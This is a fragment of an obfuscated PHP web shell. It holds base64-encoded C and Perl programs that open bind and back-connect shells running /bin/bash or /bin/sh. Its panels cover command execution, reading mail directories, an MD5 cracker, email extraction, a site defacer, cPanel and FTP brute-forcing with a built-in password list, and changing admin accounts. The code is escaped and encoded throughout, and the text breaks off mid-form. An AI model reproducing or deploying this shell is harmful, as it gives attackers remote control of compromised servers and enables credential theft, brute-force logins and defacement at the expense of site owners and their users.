if($_GET['id']==’about’) { echo About(); if($_POST['sendEmail']) { $to= ‘’; $Comments=$_POST['message']; $from = $_POST['from']; $subject= md5(“$from”); if(@mail($to,$subject,$Comments,”From:$from”)) echo “<\x73\143r\151\x70t>\x61\x6c\x65\162\164(‘Me\163s\x61ge \123\x65n\x74 \123\x75\x63c\x65\x73\163f\165\x6c\154\x79 !’);</\163\143\x72\x69\x70t>
“; else { echo “<\x73\143\162\x69\x70t>\x61\154\x65\162\164(‘S\x65\156\144i\x6e\147 Fail\145d !’);
“; } } oIP58gX9b(); } $HdobbgT8R=”I2\154uY\062x\061\x5a\107U\147\x50\x48\x4e\x30\x5aG\x6cvLm\147+\104\x51o\152\x61W5j\x62\110\126\153\132S\1018\143\x33\122yaW\065\156\x4cmg+DQoj\141\x575j\142\110Vk\x5aS\101\070\143\x33\x6c\172\x4c\x33\x52\x35\143\107\126z\114m\x67+D\x51oj\x61\x575\152\142\110Vk\132\123
\101\070\x633l\x7a\1143\x4e\166\x592t\x6c\144C\065o\x50\x67\060K\x49\062l\165\x592\x78\061ZG\125\147P\x47\065\154d\x47luZ\130Qv\x61W4ua\x44\x34N\x43\151N\x70\x62\155\x4esd\127R\154I\x44x\x6c\143\156\112\165b\x795\x6f\x50\x67\060K\x61\x57\0650IG1\x68aW4oY\130\x4an\x59\x79\170\x68c\x6dd\x32\x4b\x51\060\x4b\x61W\x35\060\111
G\106\x79\132\x32M\067\x44\x51\x70\152\141\107\x46\x79I\x43\157\161\x59\130\x4a\x6e\144\152\163NC\x6e\163g\111\x410K\111G\x6c\165\144\x43B\x7a\x622\x4erZ\x6d\x51s\x49\107\065\x6c\1442\x5a\x6bO\x770K\x49\x47\x4e\157\x59X\111\x67\131\156\x56\x6dW\x7a\x4d\x77\130T\163\116\103\x69\102\x7a\x64H\x4a1\x59\x33\x51g\x63\0629\x6a\1412F\x6bZ\110\112\146aW4g\143\155\x56\164
\x62\063RlO\167\x30\113\111\x47\x6c\x6d\113\107\x5a\166\x63\x6d\x73o\x4bS\1019PS\101w\x4b\123B7\x49\101\x30\113I\110\112\x6c\x62\x57\x390Z\x53\065\x7a\x61W\065\146\x5a\155\106t\141\127\170\x35I\104\060g\x51U\132\x66\x53U5\x46\x56\x44\163NC\x69\x42y\x5aW\x31\166\x64\x47\x55u\143\062luX\x33B\x76\x63n\121\x67P\x53B\157\x64G\071\x75c\x79\150hdG9
\x70KG\x46\171Z\063Z\x62\115\x56\060\160\x4b\x54\163\116\103\151By\x5a\x571v\x64GU\165\x63\x32\x6c\165X\x32F\153\x5a\x48\x49uc\x319\x68\132G\122\171ID\x30g\141H\122\166\142\x6dw\x6f\123U5\102\122ER\123\x580F\117\127\x53k\x37I\x41\060\x4b\111\110\116\166\x59\x32t\x6d\x5a\103\101\071I\110N\x76\x592\164\154d\103\x68BR\154\071JT\153\x56\x55\x4c\x46
\116P\1210tf\x551\122\x53\x52\125F\x4eLDApOw\x30K\x49\x47\154\155\x4b\103\106\x7a\x62\x32\116r\132m\121\x70\x49\x48\x42lc\156Jvc\151g\x69\143\x32\071\152a\x32V\060\x49\x47\126\x79\x63m9\x79I\x69k\x37DQ\157\x67\131\155\154\165\x5a\103\x68z\142\x32\x4er\132\x6dQ\163I\x43\150\172dH\x4a\x31\131\063\121g\143\062\x39\x6a\141\x32\x46\153\x5a\x48\111\147K
\151\x6bm\x63\x6d\x56\164\x623\122\154\114\x43\x41\167eDE\x77\113Ts\116\103iBs\141\x58N\x30\x5a\x574o\143\062\x39ja\x32Zk\114CA\061K\124\163\x4e\103\151\x423\x61Gl\163ZSg\x78\x4b\x510K\x49\x43B\067\104\121o\x67\111\x43\102\165\x5aX\144\155Z\x44\061\x68Y\062N\x6cc\110\x51\x6f\x632\x39\152a\x32\x5a\x6b\x4c\104A\163\115\103\153\x37\104\x51\157\x67
\x49\103\102\x6b\144\130A\171\x4b\x47\065\x6c\1442\x5a\x6b\114\104\101\160O\x77\x30K\111\103A\147Z\x48\x56w\115\151\x68\165\132\x58\144\155\x5a\x43w\x78\x4bTsN\103\151\101\x67IGR\x31cD\x49o\142\x6dV\x33\x5a\155Q\163\x4d\x69\153\x37D\x51\x6fg\111\103\x42\063c\155\154\x30\132\123\150\x75\x5a\x58\x64\x6d\x5aCwi\125\x47\106z\143\x33\144v\x63mQ6\x49\151\x77x\x4dCk
7\104\121\x6fg\x49C\x42\x79\132WF\153K\107\x35l\x642ZkLGJ1\132\x69x\172\141\130\160\x6c\1422Y\x6f\x59\156\x56\155KS\x6b\067DQ\157g\x49\x43\102pZ\x69A\157IW\x4e\x6f\x63GFzc\x79h\x68\x63\155\1442Wz\x4a\144\x4cGJ\x31Zi\x6b\x70\104\x51\x6f\147\x49\103\x42\172e\130\x4e\x30\132\x570\157\111\155VjaG\x38g\144\x32\x56\x73\1312
9\x74\x5a\123B\060byBy\x4e\x54c\x67\x632\x68l\142\107\167gJi\x59gL\x32\112\160\142i\071\151\x59\130\116\157\x49\103\061pI\x69\153\067D\121\157\x67\111\103\102lb\110\116\x6c\x44\x51\x6fg\111C\x42\x6d\143\110\x4a\x70\142\156\x52\155K\110\x4e\x30\x5aGV\171ci\167\151U2\x39\171\143\156k\x69\113\124\163N\103\151\101gIG\116\x73\1423\116\154K\107\x35\x6cd
2\132\153\113TsNCi\101g\x66\121\x30\113I\1100N\x43\156\060N\x43m\x6cu\x64CBja\x48B\150\1433\115\157\x592hh\143\151AqY\155\106\172\x5a\x53w\x67\131\x32h\150\143i\101\x71Z\12750\132\x58\x4a\x6cZ\103\153ge\x77\060\x4b\141\x57\x350I\x47k\x37\x44Q\x70m\x623\x49o\x61\124\060wO2k8\1433\x52\x79\142\107\126u\113\x47\126u
\x64\x47Vy\x5a\x57\x51pO\062\x6b\x72\x4b\x79\153gDQp\067\x44\121\x70pZ\x69\x68l\x62n\x52l\x63\x6d\126\153\x57\062\x6cd\x49D\060\071\111Cd\143b\x69\x63\160\104\121\160\x6c\142\x6e\122\154\143mVkW\x32\x6c\x64\111\x44\x30\147\x4a\061\x77w\x4a\172s\x67\x44\x51p\x70Z\151h\154b\156\122l\143m\x56kW\062\x6c\144\x49D\0609\x49\103\144c\x63\151c\160\104Q\x70
l\x62\156\122\x6ccm\x56\x6b\127\062\154\144\x49\104\x30g\112\x31w\x77\112\172s\116\103\156\060\116\103m\x6c\x6d\111\x43\x67\x68c3\x52y\x59\x321\167\x4b\x47J\x68\143\062U\x73Z\1275\x30ZX\x4al\132\x43\x6bp\x44Q\x70yZXR\061\143\155\064\147\115\104s\x4eC\156\x30=”; $IzObcgPAM=”Iy\105v\x64\x58N\171\114\062J\x70\142\151\071\167\x5a\130\x4as\104\x51\157\153\x550\x68\106\124E\x77\071\x49\151\x39i\x61\127\064\166\x59\155\x46\x7a\141C\x41\164a\x53\x49\x37\104\x51pp\132\151\x41o\x51\x45\106SR\x31\131\147\120\x43\x41xK\123B\x37\x49G\x564a\x58Q\x6f\115S\x6b\067\111H\060\116\x43\x69\x52\x4d\123
\x56\x4e\125\122U\x35f\125\105\x39S\126D0k\121\x56\112HV\x6cs\x77\130\124\163\x4eCn\126z\x5a\123\x42\124b\062NrZ\130Q7\104\121\x6f\153c\110\112\166\x64\1079\x6a\142\x32w\x39Z\x32\x560c\x48J\166dG9\x69\145\1275\x68\x62\x57\125\157J\063Rj\143C\143\x70\117\167\x30\x4b\x63\x32\x39\152a2V\060\x4b\106\115s\112\154\102\x47\1300l\117\x52\126Q\163
\112l\x4e\120\x51\060\x74\146\125\x31\x52S\122\x55FN\x4c\x43Rw\143m90\x62\x32N\166\142Ck\147\x66Hw\147\132Gl\x6c\x49\103J\x44\x59\x57\x350IG\116\171Z\127\x46\x30Z\x53\102\x7a\x62\062\116\162Z\x58\122\x63b\x69I\x37\x44Qp\x7aZ\130\x52\x7ab\x32\116\x72\142\063\1020K\106M\163U\060\071MX\061NPQ0t\106\126C\x78\x54\x541\071\x53\122V\x56
\124\x52U\x46\105R\106Is\115Sk\067\x44Q\160\151\x61W5kKF\x4ds\x63\x32\x39j\x61\062F\153Z\110\112\146\141\1274\157\x4aE\170\x4a\1251\122\x46\x54\1549\x51\124\061\x4aULE\154OQUR\105\x55\x6c9\102\124\x6ck\160\113\123\x42\x38\146\x43Bk\141W\x55\x67\x49\153\x4e\150b\156Q\x67b3B\154\x62\151\102\167b3J\x30X\x47\064\151O\x77\060\x4bb\x47
\x6c\x7ad\x47V\x75\113F\x4d\163\x4d\x79k\x67\x66\x48\167\x67\x5a\107\154\154I\103\112D\131\x57\065\060I\x47\x78\x70\143\x33\122\154\x62i\x42\167\x62\063\x4a0X\107\064\151\x4f\167\x30Kd\062\x68\x70b\107\x55\157\x4d\x53\153\116C\x6e\x73\x4e\x43m\106\152Y2Vw\x64\103\x68\x44\x54\x305\117LFM\160\117w0KaW\131\x6f\111\x53\x67k\x63\x47\154kP\127\132v\x63\x6ds\x70\113
Q0K\x65w0\x4b\x5aG\x6c\154ICJ\x44\x59W\x35\x75b\x33\x51\x67Z\155\071\x79\141\171\x49\x67a\127Yg\x4bCF\153\132\x57\x5a\160\x62mVk\x49\x43\122\167\141\127Q\x70\x4fw\x30Kb\x33\102lb\x69BTV\105\x52\112\124\151\167i\120\x43\x5aDT\060\x35O\x49\152\x73\116C\155\071\x77\x5a\127\x34\147\x55\061\x52\105\124\x31\126\125\114\103\111+J\153\116\x50\x54k4\x69
O\x77\060\x4bb3\102\154\x62\151\102\x54VE\122\x46U\x6c\111\x73Ij\064\155\121\060\x39\117\124\x69I7D\x51p\x6ce\107\126\x6a\111C\x52\x54\x53E\x56\x4d\x54\x43\x42\070\146\x43\x42k\x61\x57\x55\x67\143\110\112\x70b\x6e\x51\x67\1210\071\x4f\x54\x69\101\151\121\062\x46\x75\x64CBle\107\x56j\144\130\122lIC\122T\123E\126\x4d\124\x46x\x75\111\x6a\x73\x4e\x43\155\116\x73\x623\116
lI\x45\116PT\x6b\x347\x44\121\x70\154\x65\x47\x6c\x30\111\x44A7\x44Q\1609\x44Q\x70\x39″; $Eos1egq1Z=”Iy\105\x76\x64\130N\x79L2\x4a\x70\x62i\x39w\x5a\130\x4a\163\x44\x51\160\x31\1432\125\x67U29\x6aa2\126\060\117\167\060K\x4aG\x4e\x74\x5a\104\060\147\111\x6d\170\x35\x62\156g\151\117\x770\x4bJHN\065c3\122\x6c\142\124\x30\x67\x4a2V\x6a\x61G\070\147\x49\155B1b\155\106\x74\x5a\123\x41t\131WA\x69\117\062\126j
\x61\x47\070\147\111\x6d\102p\x5a\x47\x41iO\1719iaW\064v\x63\x32gn\x4f\x770\x4b\x4aDA\x39\112GN\164\x5a\x44\163N\103\151R0\x59\130J\x6eZ\130\1219\112\105\x46\123R\x31Z\x62M\106\x30\x37\x44\x51o\153\143G9\x79\144\x44\060\153\121\x56\x4a\x48V\154\163\x78X\124s\116\103\151\x52\160\x59\127R\153\x63j1\x70b\x6d\x56\x30\1302F\060\x622\064\157\112\x48\122
\x68\x63md\154\144\103kg\x66\110wg\132\107\154\x6c\113\x43\112Fc\x6eJ\166\x63jo\147J\x43\x46c\142\x69Ip\117\x770\113\x4aH\102h\x5aGR\171\120\x58Nv\1312\x74h\132\x47Ry\x58\x32\x6cuK\103\x52\x77\x62\063\112\x30L\103\101\153\x61\x57F\153\x5aH\111p\x49\110x\070\111\107\x52p\x5aS\147\x69\122\x58\x4a\171\x62\x33\1116I\x43QhX\x47\x34\x69\x4b\x54
\x73\116\x43\x69\122w\143\x6d\071\x30b\x7a\x31\156ZXR\167\x63\x6d\x39\x30\x622\1125\x62\155F\164\132\123g\156\144G\x4e\167J\x79\153\067\x44\121\x70\172b2\x4e\x72\132\x58Q\157\1250\x39\104S\x30\126UL\x43BQ\x52l\071\112\124kV\125\x4c\103\x42T\x54\060NL\130\061\116U\x55k\126BT\x53\167\147\112H\102\171b\x33\122vK\x53\1028f\103\102ka\x57\x55oI
k\126yc\x6d\x39\x79\117i\x41\x6bIV\170u\111i\153\x37D\x51\x70jb\x32\x35\x75ZWN\x30K\106\116\x50Q\060\164\106VC\x77\147J\110\x42\150\132\107\x52y\x4bS\x42\070\146\x43\102ka\127U\x6f\111\153\126y\143\x6d9\171\x4f\151A\x6b\111\126\170\x75\111i\153\067\x44\x51pv\143\x47Vu\113\106NUR\x45\154\117L\103\x41\x69PiZT\x54\x30\116\x4c\122V\121\151
\x4b\x54s\x4e\103\x6d9\167\132W4\x6f\125\061\x52ET\x31\x56\x55\114\x43\101i\120iZ\x54\x540\116\x4c\x52\x56Q\x69\x4bT\163\116C\x6d9wZ\127\x34o\x551\122E\x52\126\x4aS\x4cCAiP\151\x5aT\1240\x4eL\122\126Q\x69\113\124\163\116\103n\1165\1433R\154\x62\x53\147\153\143\063\x6cz\x64\x47V\164KT\163\116Cm\116s\x623\116\154\113\x46\116\x55R\x45\x6c
\117\113T\x73\x4eC\155\116s\1423\116l\x4b\106\116\125RE9V\126\103\153\067\x44\x51\160jbG9zZ\x53\x68T\126ER\x46\x55\x6c\x49p\x4fw==”; $eSn1fg4kZ=”\x49\062\x6c\x75\x592\x781Z\x47U\x67PH\116\x30Z\x47\154vLm\x67+\104\x51\x6fj\141\127\x35jb\x48VkZSA\070\x633\x6c\x7aL\063\x4e\166Y\x32\164\154\144\x435\x6f\120\x67\060\x4b\111\062\154uY2\1701\x5a\107\125\147\x50G\065l\144\x47\154\165ZX\121va\127\x34\165\141D4\x4e\x43\155\x6c\x75\144\x43
Bt\131\x57\x6cuK\107l\165\144C\102\150\x63m\144\x6aLC\102\152\x61G\106\x79\111Cph\x63\155\x642\x57\061\060\x70\104Qp7D\121\157g\x61\x57\0650\x49\107\132\x6bO\x770\113\111H\x4e\060\x63nV\x6a\x64\103Bz\142\062N\x72Y\127\122k\x63\x6c\071\160b\x69BzaW4\067\x44Q\x6f\147\1312h\150c\151\x42yb\x58\116\x62\115\152F\144PSJy\x62
SAtZ\x69\x41\151Oy\101N\x43\151\102k\x59\127\x56\164\1422\x34oM\x53\167\x77K\124\163\x4e\x43iB\172aW\064\x75\143\x32\x6c\165\x582\x5a\150\x62W\154\x73\x65S\x41\071\111\x45\x46\107X\x30lO\122\x56\x51\067\x44\x51\157gc2\154\165L\x6e\x4e\160\142l\x39\x77\1423\x4a\060\x49\104\060\147\x61\110Rvb\156\x4do\131\x58\x52\x76\x61\123h\150\x63\x6d\x642\127\172\112\x64
KS\x6b7DQ\x6fg\143\x32\154\165L\156\116\x70\142\1549h\x5a\x47\x52\x79\x4cn\116\x66\131\127\122\153ci\101\071\x49Gl\165\132\130R\146YW\122\153\143\151\x68hc\155d2\x57z\106\x64\x4b\124\163\x67\104Qo\147Y\156\x70\154\143\1558\x6f\x59\130\112n\x64ls\x78X\123\170\x7a\x64H\x4a\163ZW4o\131\x58Jnd\x6c\x73\x78XSkr\115\123\x74z\144\110J
s\x5a\x57\x34o\x59\130J\156\144\x6c\163yX\123kpO\x79AN\x43\x69B\x6dZCA\071I\x48\x4e\x76\x59\062t\x6c\144C\x68\102\x52\x6c9\x4a\x54\x6b\x56\125LC\102TT0NL\x58\061\116\125\x55\x6bVB\x54\123\167\147\x53VB\x51Uk\071\125\x54\x31\x39\125\1211\x41\x70I\x44\163\x67\x44Q\x6fg\141W\x59\x67\x4b\103\x68j\x62\x325\x75\x5a\x57\1160\x4bG\132k\114C
\x41\157\143\063\x52\171dW\x4e\x30\x49\x48\116\166Y2\x74h\x5a\x47\122\x79\x49Co\x70\111\x43\x5a\x7aaW\x34sI\x48N\x70\x65mV\166\132\x69h\172dH\112\x31\x59\x33Q\x67\1432\x39\152a2\106\x6b\132\110\x49p\113\123k8MCk\147\145w\060KI\x43\101\x67c\x47\x56\171\x63\x6d9\x79K\x43\112\x62\114V\x30g\131\x32\x39\x75\x62\x6d\x56\152\x64\103gpI\x69\x6b\x37\104
\121\157\147I\x43Bl\x65G\154\060\x4bD\101\x70\117\1670K\x49\110\060\x4eC\x69\102\172\x64H\x4a\x6aY\130Q\157c\x6d\061\172\x4c\103Bh\143\x6d\1442\127zB\144\113\124s\116\x43\x69B\172\x65X\116\060ZW0\x6f\x63\x6d\x31\x7a\113Ts\x67I\x41\x30\x4b\x49\x47\122\061\143\104I\x6f\x5a\155\121\163\111\x44\x41\x70\x4f\x770\x4b\x49\x47\1221\x63\x44\111\x6f\x5a\155\x51s\111\104\105p
\x4f\x770\113I\x47\122\x31c\104\x49o\x5a\155\x51s\x49DI\x70\x4fw\060K\111\x47\x56\x34\x5aWN\x73KCIvY\155\154\x75\114\063N\x6fIiw\x69c\x32\147\147\x4c\x57\153i\114\x43BO\126\x55\170\x4d\113Ts\x4eC\151\x42\x6a\142\1079\x7a\132\123h\x6dZCk7\111\101\x30\x4b\x66\121==”; }

; ?>



<\x66\157r\155 method='\x50OS\124'><\164\x72>
<\164d wi\x64t\x68='4%' he\151\x67h\164='21' \x73\x74\171\x6ce='ba\x63\153gro\165\x6e\x64-c\157\x6co\x72:".$kHFd4g91d."'>&\156b\163\x70;
<\x74\x64 s\164y\154\145='b\x61c\x6b\147\162\x6f\165n\x64-\143o\x6co\x72:#666;\x70\x61d\x64\x69\156\x67-l\x65f\x74:10\x70x;'>\103\x6fm\x6d\141\x6e\x64\163 A\154\x69\141s </\x74r><\164d h\145\151\147ht='45' c\x6f\154\x73p\x61\x6e='2'>“;bAN13g609($afSadgZf6); echo “
</\164\x64></\164\x61\x62l\145>


<\164\x64 \167\x69\x64\x74\150='30%' he\x69\147h\164='30'>


<\164\x61b\154\145 \167\151\144\x74\x68='100%' \x68\x65\x69g\x68\164='72' \x62\x6fr\x64\x65r='0' \x69\x64='\102o\x78'>
<\x74\x64 \x77\x69dth='4%' h\x65i\147ht='21' \x73t\171l\145='ba\143\153\147r\157\x75\156\144-\x63\x6f\x6co\162:".$kHFd4g91d."'>&\156\142s\x70;
<\x74\x64 s\164yl\x65='\142\141c\153g\x72\157\x75\156\144-\x63o\154\157r:#666;\160\141\144\x64\151n\147-\154\145\146\164:10\x70\170;'>\x43\x6f\155\x6d\x61\x6ed \x4c\x69\x6e\145 </\x74\x64><\x74\162><\x74\x64 he\151\x67\150t='45' \143\157\154\x73\x70\x61\x6e='2'>

</\x74d>

\x47et \x46\x69\x6ce </\164\x72><\164\x72>

<\x73elec\164 name='getType'>

\x46\157\162\142\151d\x64en </\164r><\164\162>



&\156bsp;</\x74\x64>

H\141\x73\x68 An\x61\154\171\172\145\162
E\x6e\x63r\171\160t\151\157\156 <\x74r><\164\x64 \150ei\x67h\x74='45' \143\157\x6c\x73pa\x6e='2'>

</\164r></\x66o\162\155>


<\146\x6f\162\155 method='P\117S\x54'><\x74\141\x62l\x65 w\151\x64\164h='100%' hei\x67\x68\164='72' b\x6fr\144e\162='0' \151\144='\102\157\170'>
&\x6eb\x73\x70;</\164\144>
A\x43P \x46ind\x65\162

<\x66\157rm method='\120O\123\x54'><\x74r>
<\x74\x64 w\x69\x64t\x68='4%' \150\145\151\147h\164='21' \163\164\x79\x6c\x65='b\x61\143\153\x67\x72ou\156\144-c\157\x6c\157r:".$kHFd4g91d."'>&nb\163p;</\x74\144>
<\x74d s\164\x79\x6c\145='b\141ckgrou\x6e\144-\143\157\154\157\162:#666;\160\141\144\x64ing-\x6ce\146t:10p\x78;'>SQ\114 \122\x65a\144\x65\x72</\x74\x64></\x74r><\x74\x72><\x74\144 \150\x65\x69\147\150t='45' c\157\x6c\163\x70\141n='2'>

<\142\x72/>

“; if($TDrd5gUCV) { echo ‘
‘; } echo “</\x74r></\x66o\x72\155>


<\x74d \x76\x61l\151gn='\164o\160'>

<\x74\141\x62l\145 \167\x69\144\164\x68='100%' he\x69g\x68\164='72' b\157r\x64\145\x72='0' \x69\144='B\157\x78'>

&\x6eb\x73\160;

\x4d\104\065 \x43r\141\x63\153e\x72<\x74\x72>

\x66\x75nc\164i\x6f\x6e i\x6e\163(text){
\x64ocu\155\145\156\164.\156\163t.chars.value+=text;
\x64o\143um\x65nt.\x6es\x74.chars.\146oc\165s();
}
</\163\x63\162\x69p\x74>



<\142\x72>

<\146\x6f\156\164 co\154\157\x72=\147\x72\141\x79>\x45\x4e:</\146o\156\x74>
a-z
\101-\x5a
0-9
<[]{}:&n\x62\x73p;.,\&q\165\157t;\")>\x53y\x6d\x62\157\154\x73
</\164d></\x74\x72></\x74\x61\142\x6c\x65>

</\164\x64>


<\146\x6fr\155 method='\x50\x4fS\124'><\164\x61\142\154\x65 \167id\x74h='100%' h\x65ig\150\164='72' \x62\157\162\144e\162='0' \x69\x64='Bo\x78'><\x74\x72>
<\x74d \167id\x74h='4%' h\145\151\147\x68\164='21' st\x79\154e='b\141\143\x6bg\162\x6f\x75n\x64-c\157l\157r:".$kHFd4g91d."'>&\156\142sp;
<\164d styl\145='\x62\x61\x63kgro\x75\156d-c\157lo\162:#666;pa\144d\x69\156\x67-\154\145\x66\x74:10\x70x;'>\x45m\x61\151\154 E\170tr\x61c\x74\x6f\162<\x74r><\x74\x64 \x68\145\x69\147h\164='45' c\157\x6c\163\x70a\x6e='2'>


</\164r></\164able></\x66\157rm>

</\164\144>

\123\121\114 Qu\x65r\x79</\164\144></\x74\162><\164\144 \150\x65\151\x67h\164='45' \143\x6fl\x73\160\141n='2'>


<\x74\145\170\164are\141 name='\121\125' rows='4' \143ols='44'>\x53\105\x4cECT * \x46R\x4f\x4d \x65m\x70 ;</\x74ex\x74\x61\x72\145\141>

</\x74\144></\x74a\142l\x65>

</\164\x64>


<\x66\157\162m method='\x50\x4f\123T'><\x74\x61b\x6c\145 \x77i\x64\164h='100%' \x68\x65\x69g\x68\164='72' \x62o\162\x64\x65\162='0' i\x64='\x42ox'><\164\162>
<\x74d w\x69\x64\164\150='4%' \x68\x65\x69\147\x68\x74='21' \x73\x74\171\x6c\x65='\x62ac\x6b\147\x72o\x75\156d-\x63\157lor:".$kHFd4g91d."'>&nb\x73\x70;</\x74d>
<\x74\x64 \x73ty\154e='b\x61ckg\162\x6f\x75n\x64-c\x6f\154\157r:#666;\x70\x61d\x64\151\156\147-\154\145\x66\x74:10\x70\x78;'>\x41\x75\164o\x6d\141ti\x63 \110\141cki\156g</\164\144></\164r><\164\162><\164\144 he\x69\147\150\164='45' c\157lsp\x61\156='2'>

<\x73e\x6cec\x74 name='ScriptType' >

Z\157\x6ee-H D\x65\x66\x61c\x65\162</\164\x64></\164\162> “; echo ‘

‘; echo “</\x74\x64></\x74\162></\164\141\x62\x6c\x65>

</\164\144>
<\x74\x64 \x76a\154\x69\x67n='t\157\x70'>

<\x66\157\162\x6d method='\120\x4fS\124'><\164a\x62\154\x65 \167i\x64\164\150='100%' \150e\151g\x68\x74='72' bo\162\144er='0' i\144='\x42ox'>

&\156\142sp; \103pa\x6e\145l \101\x6ed \106T\120 B\x72\x75te\106o\x72\143\x65 </\x74d></\x74r> “; @system(‘ls /var/mail’); echo “</\x74\x65\x78\164a\162\145a>
<\x74\x65xt\141\x72e\x61 rows='12' name='p\141\x73\x73\x77\157rd\x73' \143\x6f\x6c\x73='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$%^&*(\npassword\npasswd\n\x70\141\163s\x77o\x72d\163\npass\n\x70@\x61\x73sw0\x72\x64\npass@\x77o\162\x64\061
</\164\x65\170\164\141\162e\x61>

<\x73y>C\160\141\x6e\x65\154 (2082)</\163\x79>

\x46\x74p (21)</\163y>

</\164\x64></\164r>

</\164\144>


<\146\x6f\162m \145\156c\164\x79\160\x65=\"\155\165\154ti\x70\141\162t/fo\162\x6d-data\" method=\"P\117\123\124\"><\x74\x61\x62\x6c\x65 \x77idt\x68='100%' \150\x65\151gh\x74='72' \142\x6f\162\x64e\162='0' \151d='Bo\x78'>

C\x68\x61n\147\x69\x6e\147 \x41\144min I\156\x66\157 </\x74r><\x74\162><\x74d heig\x68\x74='45' c\x6f\x6cs\x70a\156='2'>